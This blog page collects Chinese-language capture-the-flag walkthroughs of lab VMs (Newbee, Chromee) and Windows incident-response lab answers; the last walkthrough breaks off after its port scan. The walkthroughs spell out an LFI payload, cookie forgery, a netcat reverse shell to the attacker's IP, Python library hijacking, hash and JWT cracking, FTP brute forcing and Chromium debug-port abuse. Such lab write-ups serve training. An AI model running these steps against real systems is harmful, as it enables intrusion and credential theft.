lvzhouhang
0%

发表于 分类于
本文字数: 14k 阅读时长 ≈ 13 分钟

信息搜集

arp-scan -l

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:f5:b9:af       PCS Systemtechnik GmbH
192.168.31.122  00:0c:29:71:20:21       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.384 seconds (107.38 hosts/sec). 3 responded

192.168.31.122就是ip地址

nmap 192.168.31.122 -p-扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.122 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 08:21 EDT
Nmap scan report for 192.168.31.122
Host is up (0.00090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:71:20:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds

80端口

查看页面源码,在最下面可以发现有一个

1
<!--Wrong paramter to GET-->

对get参数进行fuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌──(root㉿kali)-[~/Desktop/tmp]
└─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -u "http://192.168.31.122?FUZZ=/etc/passwd" --hh 18851
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.31.122?FUZZ=/etc/passwd/
Total requests: 220559

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001799:   200        376 L    1270 W     18863 Ch    "hack"

能fuzz出来参数名为hack,但是页面最下方还是会报错

1
<!-- include failed try another file -->

尝试包含其他文件

扫描目录可以扫描到一个secret.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.122/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt -x .php,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.122/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 18852]
/contact.php          (Status: 200) [Size: 8853]
/about.php            (Status: 200) [Size: 10036]
/blog.php             (Status: 200) [Size: 9782]
/products.php         (Status: 200) [Size: 12163]
/terms.php            (Status: 200) [Size: 6670]
/assets               (Status: 301) [Size: 317] [--> http://192.168.31.122/assets/]
/testimonials.php     (Status: 200) [Size: 7907]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.31.122/javascript/]
/checkout.php         (Status: 200) [Size: 13307]
/secret.php           (Status: 200) [Size: 2187]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]

secret.php可以执行命令,但是必须要先进行身份验证,用lfi包含secret.php试试

1
http://192.168.31.122/?hack=php://filter/convert.base64-encode/resource=secret.php

可以包含出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#secret.php
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>命令行控制台</title>
    <style>
        body {
            background-color: #1e1e1e;
            font-family: Consolas, monospace;
            color: #fff;
            margin: 0;
            padding: 0;
        }

        .console {
            width: 80%;
            margin: 50px auto;
            padding: 20px;
            background-color: #000;
            border-radius: 8px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.5);
            height: 400px;
            overflow-y: auto;
            font-size: 16px;
        }

        .output {
            white-space: pre-wrap;
            margin-bottom: 10px;
        }

        .input-container {
            display: flex;
            align-items: center;
        }

        .input-container .prompt {
            color: #00ff00;
            margin-right: 5px;
        }

        .input-container input {
            background: transparent;
            border: none;
            color: #fff;
            width: 100%;
            padding: 5px;
            font-size: 16px;
            outline: none;
        }

        .input-container input:focus {
            border: 1px solid #00ff00;
        }

        .input-container input::placeholder {
            color: #888;
        }

        .console-footer {
            padding-top: 10px;
            color: #888;
            font-size: 12px;
            text-align: center;
        }
    </style>
</head>
<body>

<div class="console">
    <div class="output" id="output">
        <?php

        if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {

            if (isset($_GET['command'])) {
                $command = $_GET['command'];
                $output = shell_exec($command);
                echo '<div>\> ' . htmlspecialchars($command) . '</div>';
                echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
            }
        } else {
            echo '<div>No permission to execute commands, lacking admin permission.</div>';
        }
        ?>
    </div>

    <div class="input-container">
        <span class="prompt">\></span>
        <form method="get">
            <input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
        </form>
    </div>
</div>

<script>
    const inputField = document.getElementById("input");

    inputField.focus();
</script>

</body>
</html>

伪造cookie

1
Cookie: AreYouAdmin=yes

然后反弹shell

1
2
nc -e /bin/bash 192.168.31.129 4444
script -qc /bin/bash /dev/null #获得交互式shell

提权

1
2
3
4
5
6
7
8
9
www-data@Newbee:/var/www/html/shop$ sudo -l
sudo: unable to resolve host Newbee: Temporary failure in name resolution
Matching Defaults entries for www-data on Newbee:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    targetpw, use_pty

User www-data may run the following commands on Newbee:
    (debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#vuln.py
import random
import time
import math
import string
import datetime

def generate_random_string(length=10):

    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def pointless_computation():

    number = random.randint(1, 1000)
    result = math.sqrt(number) * math.log(number)
    print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")

def simulate_time_wasting():

    now = datetime.datetime.now()
    print(f"Started wasting time at {now}")
    time.sleep(2)  # 故意睡眠 2 秒
    later = datetime.datetime.now()
    print(f"Finished wasting time at {later}. Time wasted: {later - now}")

def pointless_string_operations():

    rand_str = generate_random_string()
    print(f"Generated random string: {rand_str}")
    reversed_str = rand_str[::-1]
    print(f"Reversed string: {reversed_str}")
    print(f"String length: {len(rand_str)}")

if __name__ == "__main__":
    pointless_computation()
    simulate_time_wasting()
    pointless_string_operations()
    print("All done. The script accomplished nothing useful.")

可以在/var/www/html目录下创建一个random.py文件进行劫持,python文件会优先加载当前目录下的库

1
2
3
#random.py
import os
os.system("bash -p")
1
2
www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
debian@Newbee:/var/www/html$

提到debian用户了,home目录下有一个note.txt和一个config.php

1
2
debian@Newbee:~$ cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
1
2
3
4
5
6
7
8
9
10
11
debian@Newbee:~$ cat config.php
<?php
$servername = "localhost";
$username = "root";
$password = "


$conn = new mysqli($servername, $username, $password);

............
............

要拿到数据库的密码

查看端口

1
2
3
4
5
6
7
8
debian@Newbee:~$ ss -lntup
Netid  State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port Process
udp    UNCONN  0       0              0.0.0.0:68          0.0.0.0:*
tcp    LISTEN  0       128            0.0.0.0:22          0.0.0.0:*
tcp    LISTEN  0       80           127.0.0.1:3306        0.0.0.0:*
tcp    LISTEN  0       128          127.0.0.1:5000        0.0.0.0:*
tcp    LISTEN  0       128               [::]:22             [::]:*
tcp    LISTEN  0       511                  *:80                *:*

可以发现本地有5000端口,用socat将5000端口转发出去

1
debian@Newbee:~$ socat TCP-LISTEN:5001,fork TCP4:127.0.0.1:5000

是一个留言板,登录处除了admin,其他的都可以随意登录,cookie里有一个jwt,可以猜测是jwt伪造

可以用hashcat爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 -m 16500 ./1 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEyMzEyMyIsImV4cCI6MTc0MzAyNTM4OH0.qTMF9XS0BYo7nKIDg9rFr1qmUfR4btXsLS7GZv2QVW4:noob

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 16500 (JWT (JSON Web Token))
Hash.Target......: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZS...v2QVW4
Time.Started.....: Wed Mar 26 08:44:45 2025 (3 secs)
Time.Estimated...: Wed Mar 26 08:44:48 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2052.7 kH/s (0.87ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5025792/14344385 (35.04%)
Rejected.........: 0/5025792 (0.00%)
Restore.Point....: 5021696/14344385 (35.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: noobface888 -> nona1807
Hardware.Mon.#1..: Util: 44%

Started: Wed Mar 26 08:44:44 2025
Stopped: Wed Mar 26 08:44:49 2025

noob就是密钥,用户名伪造成admin,可以看到留言板的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
debian@Newbee:~$ mysql -uroot -pTheStrongestPasswordHYHcreated
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

No entry for terminal type "unknown";
using dumb terminal settings.
No entry for terminal type "unknown";
using dumb terminal settings.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

user库的user表里有debian的密码

1
2
3
4
5
6
7
8
9
Database changed
MariaDB [user]> select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd
                   | salt                             | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
|  1 | debian   | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60   |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.001 sec)

pbdf2爆破参考https://notes.benheater.com/books/hash-cracking/page/pbkdf2-hmac-sha256

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 2
sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat -a 0 ./2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12500H, 2917/5898 MB (1024 MB allocatable), 8MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found as potfile and/or empty entries! Use --show to display them.

Started: Wed Mar 26 08:49:58 2025
Stopped: Wed Mar 26 08:49:59 2025
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat ./2 --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA:1qaz2wsx

用户home目录下还有一个.secret目录,里面有一个密码的压缩包

1
2
3
4
5
6
7
debian@Newbee:~$ cd .secret/
debian@Newbee:~/.secret$ ls
hint.txt  password.zip
debian@Newbee:~/.secret$ cat hint.txt
password is md5(key)

and key is in mysql!!!!!!

密码是1qaz2wsx的md5

图片是马赛克,网上有一个项目是用来恢复马赛克的

https://github.com/spipm/Depixelization_poc

其实也不用跑,图片的原图就是这个项目的示例图片

密码是hellofromtheotherside

1
2
3
debian@Newbee:/tmp$ su - root
Password:
root@Newbee:~#

发表于 分类于
本文字数: 8.2k 阅读时长 ≈ 7 分钟

信息搜集

arp-scan -l

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:01:8c:4d       PCS Systemtechnik GmbH
192.168.31.100  08:00:27:f9:e1:65       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.402 seconds (106.58 hosts/sec). 3 responded

ip为192.168.31.100,然后用nmap扫描端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.100 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 07:14 EDT
Nmap scan report for chromee.hmv (192.168.31.100)
Host is up (0.0019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8080/tcp  open  http-proxy
23333/tcp open  elxmgmt
MAC Address: 08:00:27:F9:E1:65 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds

80端口

gobuster扫描目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-me
dium.txt -x .txt,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/post.php             (Status: 200) [Size: 3]
/secret.php           (Status: 200) [Size: 549]

有一个post.php和secret.php,secret.php不会解析成php会直接下载下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#secret.php
<!DOCTYPE html>
<html>
<head>
    <title>Secret</title>
</head>
<body>
    <?php
    $greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
    $visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);

    echo "<h1>{$greeting},adriana</h1>";
    echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>";
    echo "<p>你的IP:{$visitorIP}</p>";
    if (isset($_GET['aaa'])) {
    	$file_content = file_get_contents('/opt/note/dic.txt');
    	echo $file_content;
	} else {
    		die();
	}
    ?>
</body>
</html>

8080端口

先用gobuster扫描一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.100:8080" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2
.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.100:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 328] [--> http://192.168.31.100:8080/javascript/]
/silence              (Status: 403) [Size: 281]
/server-status        (Status: 403) [Size: 281]

有一个silence,访问发现Forbidden了

用bp的BypassPro插件发现换一种请求会变成301,感觉有问题,后面添加一个index.html发现绕过了

有一个邮箱,将这个域名添加进hosts里,再去访问http://chromee.hmv/secret.php发现secret.php解析了,GET传入aaa=1

1
2
3
4
5
6
下午好,adriana
当前时间:2025-03-21 12:28:34

你的IP:192.168.31.1

The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.

这里有两个人名,adriana和Lily,用cupp各生成一个字典,然后将两个字典合并爆破ftp(23333端口)

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# hydra -L ./name -P ./pass 192.168.31.100 ftp -s 23333 -f  -t 50
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 07:32:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 208 login tries (l:2/p:104), ~5 tries per task
[DATA] attacking ftp://192.168.31.100:23333/
[23333][ftp] host: 192.168.31.100   login: adriana   password: Lily2020
[STATUS] attack finished for 192.168.31.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 07:32:31

爆破出了账号密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ftp adriana@192.168.31.100 23333
Connected to 192.168.31.100.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||20808|)
150 Here comes the directory listing.
drwxr-xr-x    2 106      115          4096 Mar 09 08:13 .
drwxr-xr-x    4 0        0            4096 Mar 09 08:12 ..
-rw-r--r--    1 0        0            3414 Mar 09 08:13 ...
-rw-r--r--    1 0        0             495 Mar 07 14:40 dic.txt
226 Directory send OK.

这有…文件,一开始以为是一个目录,cd不进去,也不看报错就没管了(唉,细节决定成败)导致卡了好长时间,但是卡的时候也没有荒废,在/srv目录下有一个zeus.conf,后面提权要用到

1
2
3
4
5
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# cat zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium
permit nopass :softly as root cmd /usr/bin/kill
1
2
3
4
5
6
7
8
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5941|)
150 Here comes the directory listing.
drwxr-x---    5 1000     1000         4096 Mar 21 08:18 follower
drwxr-x---    5 1001     1001         4096 Mar 21 05:37 softly
226 Directory send OK.

还可以知道用户名

…文件是一个私钥,john可以爆破出来密码

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# john 1 --show
id:cassandra
1
2
3
4
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# ssh follower@192.168.31.100 -i id
Enter passphrase for key 'id':
follower@Chromee:~$

提权

follower下有一个cat.git和note.txt

1
2
3
4
5
follower@Chromee:~$ cat note.txt
Think about rotations and the cat’s secrets.


47 is not just a number, it's a twist of fate.

这个47提示的很明显是rot47

cat.gif用convert可以分离出来12张图片,但是没有用

1
convert cat.gif 1.jpg

不是空间轴可以试试时间轴

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# identify -format "%T " cat.gif
65 98 65 100 102 98 67 6 6 6 6 6 6

将后面的6个6去掉扔进cyberchef中解密然后rot47解密

得到了p3p573r,因为前面拿到的zeus.conf能够知道follower需要密码才能以softly执行wfuzz

先用find找到wfuzz的路径

1
2
3
4
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find / -name "wfuzz" 2>/dev/null
/home/follower/.config/wfuzz
/usr/local/bin/wfuzz
/usr/local/lib/python3.9/dist-packages/wfuzz    #这个就是wfuzz的路径
1
2
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find ./ -writable 2>/dev/null
./plugins/payloads/file.py

在他的wfuzz的目录下找可以写的文件能找到file.py,cat一下

1
2
3
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")

不用想了,肯定是作者降低难度了后门都留好了

1
2
3
4
follower@Chromee:~$ /usr/local/bin/doas -u softly /usr/local/bin/wfuzz -z file -u "127.0.0.1"
Password:
 /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@Chromee:/home/follower$

上传pspy64,能发现每隔一段时间root用户都会执行secript.sh

1
2
2025/03/21 12:53:01 CMD: UID=0     PID=1504   | /bin/sh -c /root/script.sh
2025/03/21 12:53:01 CMD: UID=0     PID=1505   | /bin/bash /root/script.sh

结合题目名Chromee和前面得到的zeus.conf,能猜到肯定和浏览器有关系,运行linpeas.sh能看到/media下有一个debug.kdbx

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# file debug.kdbx
debug.kdbx: PDF document, version 1.7

是一个pdf文件

去网上查这个东西,谷歌浏览器自带这个工具chrome://inspect/,还有这个9222的默认端口(后面要用到)

先写一个authorized_keys

在网上查到开启远程debug的命令

1
doas /usr/bin/chromium --headless --remote-debugging-port=9222 --no-sandbox http://127.0.0.1

因为靶机没有桌面,所以一定要带上–headless,不然会报错,启动好后再用socat端口转发

1
softly@Chromee:~$ ./socatx64.bin TCP-LISTEN:9999,fork TCP4:127.0.0.1:9222

用谷歌浏览器连接,打开第一个连接

等一会就会发现向127.0.0.1/post.php发送一个key,不用base64解码,这个就是root的密码。

chromium的远程端口必须要是9222默认端口否则他监听不到就很难受

发表于 分类于
本文字数: 245 阅读时长 ≈ 1 分钟

隐藏用户名称

这还没开始第一道题就已经结束了

攻击者的两个IP地址

远程登录找到一个ip

在hacker的目录下能找到一个system.bat的文件,可以看到向web里面写了一个webshell,可以去查看apache的日志

还有第一个flag

第二个IP

黑客遗留下的flag【3个】

计划任务里有一个flag

可以看到web是一个Z-blog,去官网下载一个修改后台密码的工具

https://bbs.zblogcn.com/thread-83419.html

可以看到还有一个hacker用户

第三个flag

发表于 分类于
本文字数: 502 阅读时长 ≈ 1 分钟

1.攻击者的IP地址(两个)?

第一个ip在apache的日志里,另一个是登录日志可以直接用工具windows1check或者事件查看器里查找

2.攻击者的webshell文件名?

查看apache的日志发现system.php是webshell的文件名

3.攻击者的webshell密码?

密码是hcak6618

4.攻击者的伪QQ号?

众所周知,qq登陆过后会默认会在文档里创建一个Tencent File里面会记录每个登陆过的qq号,在FileRecv里是通过qq下载的文件

5.攻击者的伪服务器IP地址?

黑客通过qq下载了一个frp,在frpc的配置文件里有伪服务器IP和端口

6.攻击者的服务器端口?

65536

7.攻击者是如何入侵的(选择题)?

通过分析ftp的日志文件可以发现,攻击者通过爆破ftp admin的密码登录成功,然后上传system.php文件

看phpstudy的ftp配置可以发现ftp的根目录在www目录,所以上传的system.php可以访问到

8.攻击者的隐藏用户名?

学到新招,win+r->cmd->lusrmgr.msc可以查看本地用户和组,或者C盘USER能找到hack887$

发表于 分类于
本文字数: 670 阅读时长 ≈ 1 分钟 
1
2
3
4
5
6
前景需要:小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的hxd帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件:
1.攻击者的shell密码
2.攻击者的IP地址
3.攻击者的隐藏账户名称
4.攻击者挖矿程序的矿池域名(仅域名)
5.有实力的可以尝试着修复漏洞

1.攻击者的shell密码

打开phpstudy找到网站的根目录,然后用D盾扫

能找到是一个冰蝎马,密码是rebeyond

2.攻击者的IP地址

查看phpstudy的日志文件,有apache和nginx,nginx的日志全是0kb,打开apache的access.log文件搜索shell.php能找到攻击者的ip

3.攻击者的隐藏账户名称

可以直接查看C盘的用户有一个hack168$

或者可以查看登录的日志,如果不用工具的话就在事件查看器里-安全找事件ID为4624的事件

4.攻击者挖矿程序的矿池域名(仅域名)

在C:\Users\hack168$\Desktop里有一个Kuang,这是一个python编译的exe文件,先转一下pyc然后反编译就行了

5.有实力的可以尝试着修复漏洞

phpstudy将web服务启动,是一个EMGLOG服务,后台的账号密码是admin/123456

https://blog.csdn.net/W13680336969/article/details/137267677

打上最新的补丁,并把admin的密码改掉

6.非预期

桌面上有一个解体的校验程序,和kuang一样,exe->pyc然后反编译

发表于 分类于
本文字数: 2.3k 阅读时长 ≈ 2 分钟

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    a4:a9:30:df:ef:44       (Unknown)
192.168.31.178  08:00:27:d1:eb:7a       PCS Systemtechnik GmbH
192.168.31.220  46:3e:62:f9:1e:fa       (Unknown: locally administered)
192.168.31.217  b4:0f:b3:8e:31:07       vivo Mobile Communication Co., Ltd.
192.168.31.85   7e:2c:58:df:4e:cb       (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 5 responded

ip是192.168.31.178,nmap扫描一下端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.178 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-26 01:27 EST
Nmap scan report for helium (192.168.31.178)
Host is up (0.0046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
